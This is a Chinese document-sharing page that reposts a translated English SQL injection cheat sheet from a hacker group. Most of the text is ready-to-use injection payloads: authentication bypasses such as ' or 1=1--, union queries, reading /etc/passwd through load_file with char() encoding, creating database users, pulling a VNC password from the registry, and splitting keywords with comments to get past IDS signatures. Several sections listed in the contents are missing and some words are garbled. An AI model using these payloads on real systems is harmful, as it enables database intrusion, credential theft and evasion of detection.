SQL注射技术总结文档_sql总结与例子学习

SQL注射技术总结文档由刀豆文库小编整理，希望给你工作、学习、生活带来方便，猜你可能喜欢“sql总结与例子学习”。

天马行空●狼技术小组[1.S.T ](http://www.daodoc.com--------------

翻译：浪迹天.Iceskysl@1.S.T

Iceskysl_At_www.daodoc.com

1.Introduction.2.Testing for vulnerabilities.3.Gathering Information.4.Data types.5.Grabbing Pawords.6.Create DB accounts.7.MySQL OS Interaction.8.Server name and config.9.Retrieving VNC paword from registry.10.IDS Signature Evasion.11.mySQL Input Validation Circumvention using Char().12.IDS Signature Evasion using comments.13.Strings without quotes.1.When a box only has port 80 open, it's almost certain the admin will patch his server, The best thing to turn to is web attacks.Sql Injection is one of the most common web attacks.You attack the web application,(ASP, JSP, PHP, CGI..etc)rather than the webserver or the services running on the OS.Sql injection is a way to trick using a qurey or command as a input via webpages，most websites take parameters from the user like username and pawrod or even their emails.They all use Sql querys.2.First of you should start with something simple.Pa:' or 1=1--' having 1=1--' SELECT name FROM syscolumns WHERE id =(SELECT id FROM sysobjects WHERE name = 'tablename')--' or 1 in(select @@version)--' and 1 in(select servername from master.syervers)--

9.Retrieving VNC paword from registry.-';declare @out binary(8)@rootkey = 'HKEY_LOCAL_MACHINE',@value_name='paword',select cast(@out as bigint)as x into TEMP--' OR 'something' = 'some'+'thing'' OR 'something' like 'some%'' OR 'text' > 't'' OR 2 BETWEEN 1 and 3

11.mySQL Input Validation Circumvention using Char().Inject without quotes(string = “%”):--> ' or username like char(37);Inject with quotes(string=“root”):--> ' union select * from users where login = char(114,111,111,116);load files in unions(string = “/etc/pawd”):-->' union select 1;(load_file(char(47,101,116,99,47,112,97,115,115,119,100))),1,1,1;Check for existing files(string = “n.ext”):-->' and 1=(if((load_file(char(110,46,101,120,116))char(39,39)),1,0));

12.IDS Signature Evasion using comments.-->'/**/OR/**/1/**/=/**/1-->Username:' or 1/*-->Paword:*/=1---->UNI/**/ON SEL/**/ECT-->(Oracle)

';EXECUTE IMMEDIATE 'SEL' || 'ECT US' || 'ER'-->(MS SQL)

';EXEC('SEL' + 'ECT US' + 'ER')

13.Strings without quotes.--> INSERT INTO Users(Login, Paword, Level)VALUES(char(0x70)+ char(0x65)+ char(0x74)+ char(0x65)+ char(0x72)+ char(0x70)+ char(0x65)+ char(0x74)+ char(0x65)+ char(0x72), 0x64)

Greets: kaneda, modem, wildcard, #black and pulltheplug.8